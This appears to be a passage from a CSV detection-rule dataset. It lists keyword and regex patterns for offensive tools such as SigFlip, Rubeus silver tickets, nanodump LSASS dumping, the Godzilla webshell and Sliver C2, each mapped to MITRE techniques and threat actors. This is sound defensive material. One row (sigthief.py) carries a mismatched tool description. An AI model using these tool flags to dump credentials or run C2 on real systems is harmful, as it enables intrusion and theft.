"* SigFlip.PE*",".{0,1000}\sSigFlip\.PE.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3127"
"* sigflip.x64.*",".{0,1000}\ssigflip\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3128"
"* sigflip.x86.*",".{0,1000}\ssigflip\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3129"
"* SigLoader *",".{0,1000}\sSigLoader\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","3130"
"* --sign-domain *",".{0,1000}\s\-\-sign\-domain\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3131"
"* --sign-steal *",".{0,1000}\s\-\-sign\-steal\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3132"
"* sigthief.py*",".{0,1000}\ssigthief\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","3133"
"* Sigwhatever*",".{0,1000}\sSigwhatever.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","3134"
"* --silent -obf NixImports -o /tmp/*",".{0,1000}\s\-\-silent\s\-obf\sNixImports\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3135"
"* --silent-process-exit *",".{0,1000}\s\-\-silent\-process\-exit\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","3136"
"* silenttrinity.*",".{0,1000}\ssilenttrinity\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","3137"
"* silver * /domain*",".{0,1000}\ssilver\s.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3138"
"* silver * /ldap *",".{0,1000}\ssilver\s.{0,1000}\s\/ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3139"
"* silver * /passlastset *",".{0,1000}\ssilver\s.{0,1000}\s\/passlastset\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3140"
"* silver * /service:*",".{0,1000}\ssilver\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","3141"
"* simpleLoader.c -z execstack*",".{0,1000}\ssimpleLoader\.c\s\-z\sexecstack.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","3142"
"* --single shadow.hashes*",".{0,1000}\s\-\-single\sshadow\.hashes.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","3143"
"* --single-argument https://github.com/BeichenDream/Godzilla*",".{0,1000}\s\-\-single\-argument\shttps\:\/\/github\.com\/BeichenDream\/Godzilla.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","3144"
"* sip-brute.nse*",".{0,1000}\ssip\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3145"
"* sip-call-spoof.nse*",".{0,1000}\ssip\-call\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3146"
"* sip-enum-users.nse*",".{0,1000}\ssip\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3147"
"* sip-log4shell.nse*",".{0,1000}\ssip\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","3148"
"* sip-methods.nse*",".{0,1000}\ssip\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3149"
"* SirepRAT.py*",".{0,1000}\sSirepRAT\.py.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","3150"
"* sish/deploy *",".{0,1000}\ssish\/deploy\s.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","3153"
"* sitadel.py*",".{0,1000}\ssitadel\.py.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","3154"
"* -SiteListFilePath * -B64Pass *",".{0,1000}\s\-SiteListFilePath\s.{0,1000}\s\-B64Pass\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3155"
"* --skip-crawl*",".{0,1000}\s\-\-skip\-crawl.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","3156"
"*- --skippasswordcheck*",".{0,1000}\-\s\-\-skippasswordcheck.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","3157"
"* --skipregistryloggedon*",".{0,1000}\s\-\-skipregistryloggedon.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","3158"
"* skypev2-version.nse*",".{0,1000}\sskypev2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3159"
"*----- SLEEP HOOK -----*",".{0,1000}\-\-\-\-\-\sSLEEP\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","3160"
"* slinky.py*",".{0,1000}\/slinky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3161"
"* slip.py *",".{0,1000}\sslip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","3162"
"* sliver sliver*",".{0,1000}\ssliver\ssliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3163"
"* sliver.exe*",".{0,1000}\ssliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","3164"
"* sliver_pb2.py*",".{0,1000}\ssliver_pb2\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3165"
